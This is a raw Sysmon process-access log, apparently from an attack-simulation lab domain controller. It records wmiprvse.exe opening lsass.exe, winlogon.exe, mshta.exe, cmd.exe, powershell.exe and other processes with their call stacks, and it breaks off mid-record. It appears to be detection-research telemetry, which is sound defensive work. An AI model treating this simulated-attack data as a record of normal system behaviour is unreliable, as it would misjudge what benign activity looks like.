16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.265{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E272AD8320BF670BB9D215999331C24,SHA256=921AAB83D522890EE3ACCC2588034F0F020F027298594E1358CABAF354BD9CA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.233{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.d